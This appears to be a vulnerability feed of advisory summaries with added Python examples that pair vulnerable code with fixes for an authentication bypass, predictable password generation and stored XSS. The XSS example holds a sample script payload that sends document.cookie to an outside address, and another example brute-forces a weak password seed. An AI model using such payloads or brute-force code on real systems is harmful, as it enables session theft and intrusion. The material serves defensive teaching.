EUVD-2025-203769
In limited scenarios, sensitive data might be written to a log file when an admin uses the Microsoft Teams Admin Center (TAC) to make device configuration changes. The affected log file is visible only to users with admin credentials. This is limited to Microsoft TAC and does not affect configuration...
CVE-2025-67715 Weblate has Systematic User and Project Enumeration via Broken Authorization in REST API (IDOR)
Weblate is a web-based localization tool. In versions prior to 5.15, the REST API allowed retrieving user notification settings or listing all users without the proper authorization check. Version 5.15 fixes the issue...
CVE-2025-36754 Authentication bypass on web interface
The authentication mechanism of the web interface is not properly implemented: no session token or other authentication is enforced, so the authentication checks can be bypassed by crafting a POST request that carries new settings. This would allow an attacker, for instance, to point the device to an...
EUVD-2025-203252
Same advisory text as CVE-2025-36754 (authentication bypass on web interface).
CVE-2025-14586
A vulnerability was found in TOTOLINK X5000R 9.1.0cu.2089B20211224. Affected is the function snprintf of the file /cgi-bin/cstecgi.cgi?action=exportOvpn&type=user. Manipulation of the User argument leads to OS command injection. Remote exploitation of the attack is possible...
CVE-2025-36754 Authentication bypass on web interface
Affected product and versions, root cause and exploit specifics are not given in the connected documents; monitor for updates.
PT-2025-51103
Same advisory text as CVE-2025-36754 (authentication bypass on web interface).
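The flaw class in CVE-2025-36754 is a settings handler that applies a POST body without ever checking for a session, so an unauthenticated client can repoint the device. The following is an added illustration, not code from the affected product or the advisory: the device, its endpoint, the `ntp_server` field, the demo credentials and the session-cookie scheme are all assumptions made for the example.

```python
"""Settings POST applied with no session check, beside the fixed handler.

Added example of the flaw class in CVE-2025-36754. The device model, the
single `ntp_server` setting, the demo credential and the cookie-based
session are assumptions for this demo, not details of the affected product.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Device:
    settings: dict = field(default_factory=lambda: {"ntp_server": "pool.ntp.org"})
    # session token -> username, populated only by a successful login
    sessions: dict = field(default_factory=dict)

    def login(self, username: str, password: str) -> Optional[str]:
        # Demo credential store; a real device would verify a stored hash.
        if username == "admin" and hmac.compare_digest(password, "correct horse"):
            token = secrets.token_urlsafe(32)
            self.sessions[token] = username
            return token
        return None


def apply_settings_vulnerable(device: Device, request: dict) -> int:
    """Pattern from the advisory: the POST body is applied without any
    authentication check, so anyone who can reach the web interface can
    point the device at a host they control."""
    if request["method"] != "POST":
        return 405
    device.settings.update(request["body"])
    return 200


def apply_settings_fixed(device: Device, request: dict) -> int:
    """Refuse the change unless the request carries a valid session cookie,
    and only accept settings keys the handler actually knows about."""
    if request["method"] != "POST":
        return 405
    token = request.get("cookies", {}).get("session")
    if token is None or token not in device.sessions:
        return 401
    allowed = {"ntp_server"}
    if set(request["body"]) - allowed:
        return 400
    device.settings.update(request["body"])
    return 200


def demo() -> dict:
    """Run the same attacker request against both handlers, then a logged-in
    admin request against the fixed one, and return what each produced."""
    attacker_post = {"method": "POST", "body": {"ntp_server": "10.0.0.66"}}
    vuln = Device()
    fixed = Device()
    vuln_status = apply_settings_vulnerable(vuln, attacker_post)
    fixed_status = apply_settings_fixed(fixed, attacker_post)
    unauth_ntp = fixed.settings["ntp_server"]
    token = fixed.login("admin", "correct horse")
    admin_post = {**attacker_post, "cookies": {"session": token}}
    admin_status = apply_settings_fixed(fixed, admin_post)
    return {
        "vuln_status": vuln_status, "vuln_ntp": vuln.settings["ntp_server"],
        "fixed_status": fixed_status, "unauth_ntp": unauth_ntp,
        "admin_status": admin_status, "admin_ntp": fixed.settings["ntp_server"],
    }


if __name__ == "__main__":
    print(demo())
```

The check that matters is the one on the session store, not the presence of a cookie header: a client can always send a cookie, but only the device's login path can create an entry in `sessions`. The allow-list on body keys is a second, cheaper guard so that even an authenticated session cannot introduce settings the handler never meant to expose.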
Unraid Web Interface Detection
Detection-only plugin shipped as binary data (unraidwebdetect.nbin); no vulnerability description is attached...
CVE-2025-66473
XWiki is an open-source wiki software platform. Versions 16.10.10 and below, 17.0.0-rc-1 through 17.4.3, and 17.5.0-rc-1 through 17.6.0 expose a REST API that currently enforces no limit on the number of items that can be requested in a single request. Depending on the number of...
CVE-2025-41692 Weak/Predictable root Password
A remote attacker who already holds admin privileges for the webUI can brute-force the "root" and "user" passwords of the underlying OS because of a weak password generation algorithm...
FreePBX SQL Injection Vulnerability (CNVD-2025-3038208)
FreePBX, formerly known as Asterisk Management Portal, is a set of tools from the FreePBX project for configuring the Asterisk IP telephony system through a web-based GUI. FreePBX suffers from a SQL injection vulnerability that stems from a lack of validation of externally entered S...
CVE-2025-65231
Barix Instreamer v04.06 and earlier is vulnerable to stored cross-site scripting (XSS) in the Web UI I/O & Serial configuration page, specifically the CTS close command user-input field, which is stored and later rendered on the Status page...
CVE-2025-41692 Weak/Predictable root Password
Connected sources (Red Hat and NVD-derived entries) indicate potential downstream risks: separate ...
Siemens SIMATIC CN 4100 command injection vulnerability
The Siemens SIMATIC CN 4100 is a communication node from Siemens, Germany. It suffers from a command injection vulnerability caused by insufficient validation of REST API input parameters, which an attacker can exploit to execute arbitrary code...
PT-2025-49811
Same advisory text as CVE-2025-41692 (weak/predictable root password).
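What makes a generated OS password brute-forceable, as in CVE-2025-41692, is not its length but the size of the space it is drawn from. The block below is an added example, not the affected product's algorithm: it assumes a weak scheme that seeds a PRNG with a 16-bit device identifier (an assumption for the demo), recovers that seed by exhaustive search, and shows the CSPRNG-based replacement alongside the effective entropy of each.

```python
"""Predictable password generation, its brute-force, and the CSPRNG fix.

Added example for the flaw class in CVE-2025-41692. The generator (a PRNG
seeded with a 16-bit device ID), the 8-character format and the alphabet
are assumptions for this demo, not details of the affected product.
"""
import math
import random
import secrets
import string

ALPHABET = string.ascii_letters + string.digits
WEAK_LEN = 8


def weak_password(device_id: int) -> str:
    """Assumed weak scheme: only the low 16 bits of the device ID feed the
    PRNG, so at most 65,536 distinct passwords can ever be produced."""
    rng = random.Random(device_id & 0xFFFF)
    return "".join(rng.choice(ALPHABET) for _ in range(WEAK_LEN))


def recover_device_id(password: str):
    """Brute force: regenerate the password for every seed in the 16-bit
    space until one matches. This is what a webUI admin, who can already
    read device identifiers, would run to obtain the OS root password."""
    for candidate in range(0x10000):
        if weak_password(candidate) == password:
            return candidate
    return None


def strong_password(length: int = 16) -> str:
    """Fix: every character comes from the OS CSPRNG, so there is no seed
    to recover and the search space is the full alphabet**length."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def keyspace_bits(scheme: str) -> float:
    """Effective entropy of each scheme. The weak one is bounded by its seed,
    whatever the password looks like; the strong one by its length."""
    if scheme == "weak":
        return 16.0
    return 16 * math.log2(len(ALPHABET))


if __name__ == "__main__":
    pw = weak_password(0xBEEF)
    print("weak password", pw, "recovered seed", hex(recover_device_id(pw)))
    print("strong password", strong_password(), f"{keyspace_bits('strong'):.1f} bits")
```

The brute force finishes in well under a minute on a laptop because the seed, not the 62-character alphabet, bounds the work. Any generator whose inputs are serial numbers, MAC addresses, timestamps or a default seed has the same property, and the fix is the same: draw the password from `secrets` (or the platform CSPRNG) at provisioning time and never derive it from identifiers.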
EUVD-2025-201805
Same advisory text as CVE-2025-65231 (Barix Instreamer stored XSS in the CTS close command field).
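The Barix entry (CVE-2025-65231 / EUVD-2025-201805) is the standard stored-XSS shape: a configuration field is saved verbatim and later interpolated into a status page. The block below is an added example, not Barix code: the field name `cts_close_cmd`, the in-memory store, the table template and the sample payload are all constructed for the demo. It shows the unescaped render beside the output-encoded fix.

```python
"""Stored XSS via a configuration field rendered on a status page, and the fix.

Added example for the pattern in CVE-2025-65231. The field name, the store,
the HTML template and the payload are assumptions constructed for this demo.
"""
import html

# Constructed sample payload an admin-level attacker could type into the field.
PAYLOAD = '<script>fetch("http://10.0.0.66/?c=" + document.cookie)</script>'


class ConfigStore:
    def __init__(self) -> None:
        self.fields = {"cts_close_cmd": ""}

    def save(self, name: str, value: str) -> None:
        # Storage is not the place to encode: keep the raw value so other
        # consumers (the serial port, an API) see exactly what was entered.
        self.fields[name] = value


def render_status_vulnerable(store: ConfigStore) -> str:
    """Interpolates the stored value straight into HTML: whatever was saved
    is parsed as markup when the Status page is viewed."""
    return (f"<tr><td>CTS close command</td>"
            f"<td>{store.fields['cts_close_cmd']}</td></tr>")


def render_status_fixed(store: ConfigStore) -> str:
    """Encode at output time for the context the value lands in (HTML text).
    quote=True also escapes quotes, so the same helper is safe inside
    attribute values."""
    return (f"<tr><td>CTS close command</td>"
            f"<td>{html.escape(store.fields['cts_close_cmd'], quote=True)}</td></tr>")


def contains_script_tag(rendered: str) -> bool:
    """Coarse check: does an executable <script> tag survive into the page?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    store = ConfigStore()
    store.save("cts_close_cmd", PAYLOAD)
    print(render_status_vulnerable(store))
    print(render_status_fixed(store))
```

Escaping belongs at the render site, chosen for the context (HTML body, attribute, JavaScript string, URL), rather than at save time; a value sanitised for HTML on the way in is wrong for the serial line and still unsafe if a later page puts it into a different context. A Content-Security-Policy without `'unsafe-inline'` is a useful second layer on embedded web UIs but does not replace the encoding.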